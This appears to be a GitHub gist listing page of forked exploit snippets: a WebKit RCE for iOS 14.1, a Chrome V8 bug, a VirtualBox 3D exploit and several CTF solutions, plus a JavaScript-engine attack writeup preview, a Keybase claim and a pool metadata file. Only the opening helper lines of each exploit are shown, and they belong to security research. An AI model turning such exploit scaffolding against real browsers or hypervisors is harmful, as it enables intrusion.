I hereby claim:
- I am ducphanduyagentp on github.
- I am dphan0x80 (https://keybase.io/dphan0x80) on keybase.
- I have a public key whose fingerprint is 3796 106E F244 F6C6 EE39 09B3 07A6 7A8D 5C67 96C2
To claim this, I am signing this object:
ducphanduyagentp
/ fuck.js
Created
September 6, 2021 16:41
— forked from ujin5/fuck.js
WebKit RCE on ios 14.1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function sleep( sleepDuration ){ | |
| var now = new Date().getTime(); | |
| while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } | |
| } | |
| function gc() { | |
| for (let i = 0; i < 0x10; i++) { | |
| new ArrayBuffer(0x1000000); | |
| } | |
| } | |
| let data_view = new DataView(new ArrayBuffer(8)); |
ducphanduyagentp
/ poolMetaData.json
Created
July 9, 2021 15:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "name": "MELD 1 TEST", | |
| "description": "MELD 1 TEST POOL", | |
| "ticker": "MELD1", | |
| "homepage": "https://meld.com" | |
| } |
ducphanduyagentp
/ chrome-v8-issue-1126249.js
Created
March 22, 2021 16:47
— forked from hkraw/chrome-v8-issue-1126249.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class Helpers { | |
| constructor() { | |
| this.cvt_buf = new ArrayBuffer(8); | |
| this.cvt_f64a = new Float64Array(this.cvt_buf); | |
| this.cvt_u64a = new BigUint64Array(this.cvt_buf); | |
| this.cvt_u32a = new Uint32Array(this.cvt_buf); | |
| } | |
| ftoi(f) { |
ducphanduyagentp
/ 3_years_of_attacking_javascript_engines.txt
Created
November 3, 2019 03:55
— forked from saelo/3_years_of_attacking_javascript_engines.txt
3 Years of Attacking JavaScript Engines
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| |=-----------------------------------------------------------------------=| | |
| |=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=| | |
| |=-----------------------------------------------------------------------=| | |
| |=------------------------------=[ saelo ]=------------------------------=| | |
| |=-----------------------------------------------------------------------=| | |
| The following are some brief notes about the changes that have taken place | |
| since the release of the "Attacking JavaScript Engines" paper [1]. In | |
| general, no big conceptional changes have happened since. Mitigations have | |
| been added to break some of the presented techniques and, as expected, a |
ducphanduyagentp
/ virtualbox_3d_exp.py
Created
October 18, 2019 19:24
— forked from peternguyen93/virtualbox_3d_exp.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author : peternguyen93 | |
| import sys | |
| sys.path.append('../') # back to vboxlib module | |
| from vboxlib.hgcm import * | |
| from vboxlib.chromium import * | |
| from ctypes import * | |
| ''' |
ducphanduyagentp
/ exploit.html
Created
June 24, 2019 06:00
— forked from ujin5/exploit.html
Google CTF Quals 2019 Monochromatic
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <pre id='log'></pre> | |
| <script src="mojo_bindings.js"></script> | |
| <script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script> | |
| <script src="being_creator_interface.mojom.js"></script> | |
| <script src="food_interface.mojom.js"></script> | |
| <script src="dog_interface.mojom.js"></script> | |
| <script src="person_interface.mojom.js"></script> | |
| <script src="cat_interface.mojom.js"></script> | |
| <script> |
ducphanduyagentp
/ exp.py
Created
May 13, 2019 02:51
— forked from hama7230/exp.py
DEF CON CTF Qualifier 2019 speedrun-012
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
| # context(terminal=['tmux', 'new-window']) # open new window | |
| # libc = ELF('') | |
| elf = ELF('./speedrun-012') | |
| context(os='linux', arch=elf.arch) | |
| context(log_level='debug') # output verbose log |
ducphanduyagentp
/ exploit.c
Created
February 17, 2019 01:12
— forked from sampritipanda/exploit.c
Real World CTF - SCSI Driver Exploitation Challenge
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdint.h> | |
| #include <sys/io.h> | |
| #include <unistd.h> | |
| #include <stdio.h> | |
| #include <fcntl.h> | |
| #include <sys/mman.h> | |
| #include <string.h> | |
| #include <assert.h> | |
| #include "virt_to_phys.c" |
ducphanduyagentp
/ pwn.js
Created
January 10, 2019 08:58
— forked from saelo/pwn.js
Exploit for the "roll a d8" challenge of PlaidCTF 2018
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018. | |
| // N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d | |
| // | |
| // Scroll down do "BEGIN EXPLOIT" to skip the utility functions. | |
| // | |
| // Copyright (c) 2018 Samuel Groß | |
| // | |
| // |
ducphanduyagentp
/ keybase.md
Created
January 7, 2019 08:01
NewerOlder